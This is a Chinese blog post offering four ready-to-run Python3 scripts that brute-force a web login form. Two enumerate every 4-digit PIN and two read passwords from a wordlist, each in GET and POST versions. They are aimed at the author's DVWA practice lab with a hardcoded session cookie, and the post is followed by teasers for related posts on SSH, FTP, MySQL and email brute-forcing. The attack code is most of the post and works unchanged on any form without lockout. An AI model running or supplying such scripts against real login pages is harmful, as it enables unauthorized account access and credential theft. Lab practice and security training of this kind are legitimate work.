python3登录爆破脚本

最新推荐文章于 2024-07-30 11:53:50 发布
最新推荐文章于 2024-07-30 11:53:50 发布
阅读量2.8k 收藏 15
点赞数 5
分类专栏: 笔记 脚本工具 文章标签: python 安全 post
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/deng_menglihua/article/details/108647690
版权

python3登录爆破脚本

最简单详细!!!以下地址是我自己的DVWA靶场的地址,因为是4个循环,所以是4位数密码爆破,欢迎大家交流学习。

1.post型登录框爆破脚本

import requests
s='0123456789'
url="http://10.16.102.162/DVWA/vulnerabilities/brute/?"
m=0
n=1
username=input("请输入用户名")
data2={'username':username,'password':00000,'Login':'Login'}
headers={'cookie':'security=low; PHPSESSID=711ce5ff0b53f2c388c15b16bfdc1b84'}
response2=requests.post(url,data2,headers=headers)
text2=response2.text
for a in s:
    if m==1:
        break
    for b in s:
        if m==1:
            break
        for c in s:
            if m==1:
                break
            for d in s:
                if m==1:
                    break
                password=a+b+c+d
                data1={'username':username,'password':password,'Login':'Login'}
                response1=requests.post(url,data1,headers=headers)
                text1=response1.text
                print("\r"+"字典进度为",n,"/",(len(s))**4,end="",flush=True)
                n=n+1
                if (text1!=text2) and len(text1)!=len(text2):
                    print("\n成功!")
                    print("用户名为:",username)
                    print("密码为:",password)
                    m=1
                    break

2.get型登录框爆破脚本

#4位数字
import requests
s='0123456789'
url="http://10.16.102.162/DVWA/vulnerabilities/brute/?"
m=0
n=1
username=input("请输入用户名")
data2={'username':username,'password':00000,'Login':'Login'}
headers={'cookie':'security=low; PHPSESSID=711ce5ff0b53f2c388c15b16bfdc1b84'}
response2=requests.get(url,data2,headers=headers)
text2=response2.text
for a in s:
    if m==1:
        break
    for b in s:
        if m==1:
            break
        for c in s:
            if m==1:
                break
            for d in s:
                if m==1:
                    break
                password=a+b+c+d
                data1={'username':username,'password':password,'Login':'Login'}
                response1=requests.get(url,data1,headers=headers)
                text1=response1.text
                print("\r"+"字典进度为",n,"/",(len(s))**4,end="",flush=True)
                n=n+1
                if (text1!=text2) and len(text1)!=len(text2):
                    print("\n成功!")
                    print("用户名为:",username)
                    print("密码为:",password)
                    m=1
                    break

3.调用文本字典get型登录框爆破脚本

import requests
url="http://10.16.102.162/DVWA/vulnerabilities/brute/?"
n=1
username=input("请输入用户名")
data2={'username':username,'password':00000,'Login':'Login'}
headers={'cookie':'security=low; PHPSESSID=711ce5ff0b53f2c388c15b16bfdc1b84'}
response2=requests.get(url,data2,headers=headers)
text2=response2.text
f=open("22.txt","r+")
for i in f:
    password=i.strip()
    data1={'username':username,'password':password,'Login':'Login'}
    response1=requests.get(url,data1,headers=headers)
    text1=response1.text
    #print("\r"+"字典进度为",n,"/",(len(s))**4,end="",flush=True)
    n=n+1
    if (text1!=text2) and len(text1)!=len(text2):
        print("\n成功!")
        print("用户名为:",username)
        print("密码为:",password)
        break

4.调用文本字典post型登录框爆破脚本

import requests
url="http://10.16.102.162/DVWA/vulnerabilities/brute/?"
n=1
username=input("请输入用户名")
data2={'username':username,'password':00000,'Login':'Login'}
headers={'cookie':'security=low; PHPSESSID=711ce5ff0b53f2c388c15b16bfdc1b84'}
response2=requests.get(url,data2,headers=headers)
text2=response2.text
f=open("22.txt","r+")
for i in f:
    password=i.strip()
    data1={'username':username,'password':password,'Login':'Login'}
    response1=requests.post(url,data1,headers=headers)
    text1=response1.text
    #print("\r"+"字典进度为",n,"/",(len(s))**4,end="",flush=True)
    n=n+1
    if (text1!=text2) and len(text1)!=len(text2):
        print("\n成功!")
        print("用户名为:",username)
        print("密码为:",password)
        break
Bin_少年
关注
专栏目录
python爆破脚本_多线程爆破脚本(python3)
weixin_39598941的博客
12-15 1317
#!/usr/bin/env python3# -*- coding: utf-8 -*-import loggingimport argparseimport queueimport requestsimport threadingimport osimport timeimport randomfrom html.parser import HTMLParserfrom requests.pa...
绕过token进行密码爆破(包含python攻击脚本
weixin_43960066的博客
07-30 1449
设置完毕以后开始爆破,时间取决于你的字典,如果是1个线程还没有办法爆破成功,可能是你的字典里面没有这个密码,在爆破页面我们将返回长度按照从大到小排列,就可以看到爆破成功的密码和其他的米密码长度不同。Token其实说的更通俗点可以叫暗号,在一些数据传输之前,要先进行暗号的核对,不同的暗号被授权不同的数据操作。6.服务端收到请求,然后去验证客户端请求里面带着的 Token,如果验证成功,就向客户端返回请求的数据。选择需要抓取的Token的内容,同时设置和响应中相同的参数名字,点击OK。
python之——使用python编写爆破脚本
12-21
此处以dvwa网站的密码爆破为例 #coding:utf-8 """ dvwa高级爆破 需要用户名 密码 token cookie 每次通过账号密码访问之前,需要获取token """ import urllib2 from bs4 import BeautifulSoup def getToken(): """提取token""" url="http://localhost/DVWA-master/vulnerabilities/brute/" req=urllib2.Request(url,headers={"Cookie":"security=high;PHP
python如何实现简单的暴力破解
最新发布
weixin_43305645的博客
07-30 1596
该项目的核心是实现简单网页端的密码破解,主要是为了给没有基础的人,提供一个思路,了解这方面的攻防原理,实际用途不大,现在大部分有三代四代验证码,还有一些加密算法等,并不会像文章中这么简单的实现直接跑字典而获取密码。文章内的前后端是特意写的,需要源码的话,我到时候会把前后端放在文章底部。但这里源码的具体内容我不会进行讲解。
kali运行python脚本_Python脚本--爆破SSH
weixin_39614146的博客
12-05 1193
利用Pxssh是pexpect库的ssh专用脚本环境:kali代码:'''Author:yw'''from pexpect import pxsshimport optparsefrom threading import *Max_Connect = 5connection_lock = BoundedSemaphore(value=Max_Connect)def connect(host, us...
python爆破脚本_Python FTP爆破脚本
weixin_39820177的博客
12-15 465
Python FTP爆破脚本#!/usr/local/bin/python#-*-coding:UTF-8-*-#####################################################################qq:316118740#BLOG:http://hi.baidu.com/alalmnfromftplibimportFTPimport...
python脚本爆破shell
06-14
python脚本爆破shell
md5碰撞爆破python3脚本
01-16
md5碰撞爆破python3脚本
根据指定hash值寻键爆破脚本Python实现)
08-22
代码说明 在所有可能的姓名+学号的字符串集合下,找到一个MD5散列值为"sdu_cst_20220610"的键。 通过不断构建随机姓+随机名+固定学号前缀+随机学号后缀组成的合法键进行MD5散列求值,与目标散列值比较,相等则求解...
python制作企业邮箱的爆破脚本
12-23
Python制作企业邮箱爆破脚本涉及的关键知识点包括Python编程、POP3协议、网络通信和安全性。以下是这些知识点的详细说明: 1. Python编程: - `sys.argv`:这是一个列表,用于获取命令行参数。在Python脚本中,`...
邮箱爆破脚本。代码
11-29
利用python编写的脚本,用于zimbra邮箱服务器的用户口令在线爆破
python开发poc2,爆破脚本
san3144393495的博客
04-07 919
异或就是把一个字符转换成ascii码值的二进制在,然后和另外同样方式转换的二进制,每一位都对上的如果两个对上的数相同就输出0,不同就输出1,结果就是两个数异或后的值,在转换为ascii码值之后在找到对应的字符,就是异或完最后的结果,这里刚好有一个比较凑巧的结果。---掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合 Fuzz 吊打 WAF 等。---通过异或运算,分别批量替换a,s,s,e,r,t,进而构造命令执行函数。---两个二进制异或为:01100001,对应十进制为:97。
python爆破定长密码脚本
baikeng3674的博客
02-04 172
def get_pwd(str, num):#str为可选字符集,num为密码长度 if(num == 1): for x in str: yield x else: for x in str: for y in get_pwd(str, num...
python脚本网址爆破
只会666
07-11 1191
早上看到群里放的一道CTF题,题目链接已经关了,页面上有三条链接,对应3个人名,点开观察后发现URL中page的值是md5,解码后看出是人名加3位数字,于是要第三个人名slash+3位数字,转成md5进行爆破,找到含有flag的网页,表达不清楚,直接上脚本orzimport requests import hashlib def md5(str): #md5加密 m = hashlib
python版ftp、ssh、msyql爆破脚本
东方欲晓的晓东的博客
06-26 1502
开源地址 https://github.com/dongfangyuxiao/py-study/tree/master/py-study/practice/crack 闲暇之余,写了几个爆破的小脚本,可用于爆破ftp ssh mysql 后续继续集合在一起,再加上webloigc、jboss等常见的服务 代码如下: ftp !/usr/bin/env python -- ...
密码爆破脚本
weixin_34009794的博客
04-26 444
昨天遇到一个基于onethink开发的程序。源码是脱下来了。但是密码始终破解不了。来看看加密函数 function think_ucenter_md5($str, $key = 'ThinkUCenter'){ return '' === $str ? '' : md5(sha1($str) . $key); } if(is_array($user) && $us...
Python脚本9-多线程分任务爆破
m0_61786761的博客
09-22 457
一个进程的线程数量有限,如何能够提升并发能力?将任务分配给多个不同的电脑, 或在一台电脑上运行多个程序。
Python ssh 爆破脚本
05-29
Python ssh爆破脚本是一种用Python语言编写的程序,其主要作用是在未授权访问的情况下,尝试猜解SSH服务器的用户名和密码,以获取服务器权限。SSH爆破脚本可以使用多种方法进行用户名和密码的猜测,包括但不限于字典...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值